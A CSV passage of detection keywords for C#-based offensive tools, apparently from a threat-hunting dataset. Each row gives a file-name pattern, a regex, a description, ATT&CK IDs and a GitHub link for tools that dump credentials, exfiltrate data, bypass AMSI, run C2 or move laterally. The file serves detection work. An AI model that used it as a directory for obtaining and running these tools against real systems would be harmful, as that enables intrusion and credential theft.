"*/SharpDoor.cs*",".{0,1000}\/SharpDoor\.cs.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*/SharpDoor.exe*",".{0,1000}\/SharpDoor\.exe.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*/SharpDoor.git*",".{0,1000}\/SharpDoor\.git.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*/SharpDoor.git*",".{0,1000}\/SharpDoor\.git.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*/SharpDPAPI.exe*",".{0,1000}\/SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpDPAPI.git*",".{0,1000}\/SharpDPAPI\.git.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*/SharpDump*",".{0,1000}\/SharpDump.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/SharpDump.exe*",".{0,1000}\/SharpDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpEDRChecker-*.zip*",".{0,1000}\/SharpEDRChecker\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*/SharpEDRChecker.exe*",".{0,1000}\/SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpEDRChecker.git*",".{0,1000}\/SharpEDRChecker\.git.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*/SharpEDRChecker/*",".{0,1000}\/SharpEDRChecker\/.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*/SharpEfsPotato*",".{0,1000}\/SharpEfsPotato.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*/SharPersist.exe*",".{0,1000}\/SharPersist\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharPersist.git*",".{0,1000}\/SharPersist\.git.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*/SharpEventPersist.git*",".{0,1000}\/SharpEventPersist\.git.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*/SharpExec.exe*",".{0,1000}\/SharpExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpExfiltrate.git*",".{0,1000}\/SharpExfiltrate\.git.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*/SharpExfiltrate/*",".{0,1000}\/SharpExfiltrate\/.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*/SharpFinder.exe*",".{0,1000}\/SharpFinder\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpGhostTask*",".{0,1000}\/SharpGhostTask.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","1","N/A","10","2","108","13","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z" "*/SharpGmailC2.git*",".{0,1000}\/SharpGmailC2\.git.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*/SharpGPOAbuse.exe*",".{0,1000}\/SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpHandler.exe*",".{0,1000}\/SharpHandler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpHandler.py*",".{0,1000}\/SharpHandler\.py.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 
TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/SharpHide.git*",".{0,1000}\/SharpHide\.git.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","459","94","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*/SharpHose.exe*",".{0,1000}\/SharpHose\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpHose.exe*",".{0,1000}\/SharpHose\.exe.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","1","N/A","10","4","301","63","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z" "*/SharpHound.exe*",".{0,1000}\/SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpKatz.exe*",".{0,1000}\/SharpKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpKiller.git*",".{0,1000}\/SharpKiller\.git.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*/Sharp-Killer.sln*",".{0,1000}\/Sharp\-Killer\.sln.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*/SharpLAPS.exe*",".{0,1000}\/SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpLDAP.git*",".{0,1000}\/SharpLDAP\.git.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","N/A","N/A","N/A","N/A" "*/SharpMapExec.exe*",".{0,1000}\/SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpMiniDump.exe*",".{0,1000}\/SharpMiniDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpMove.exe*",".{0,1000}\/SharpMove\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpNamedPipePTH.exe*",".{0,1000}\/SharpNamedPipePTH\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpNoPSExec*",".{0,1000}\/SharpNoPSExec.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","587","88","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*/SharpNoPSExec.exe*",".{0,1000}\/SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpPersistSD.dll*",".{0,1000}\/SharpPersistSD\.dll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*/SharpPersistSD.git*",".{0,1000}\/SharpPersistSD\.git.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*/SharpPrinter.exe*",".{0,1000}\/SharpPrinter\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpRDP.exe*",".{0,1000}\/SharpRDP\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpRDP.git*",".{0,1000}\/SharpRDP\.git.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*/SharpRDPHijack*",".{0,1000}\/SharpRDPHijack.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - 
T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","5","407","71","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" "*/SharpRDPThief.git*",".{0,1000}\/SharpRDPThief\.git.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","1","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*/SharpReg.exe*",".{0,1000}\/SharpReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpRoast.exe*",".{0,1000}\/SharpRoast\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/SharpSCCM.exe*",".{0,1000}\/SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpSearch.exe*",".{0,1000}\/SharpSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 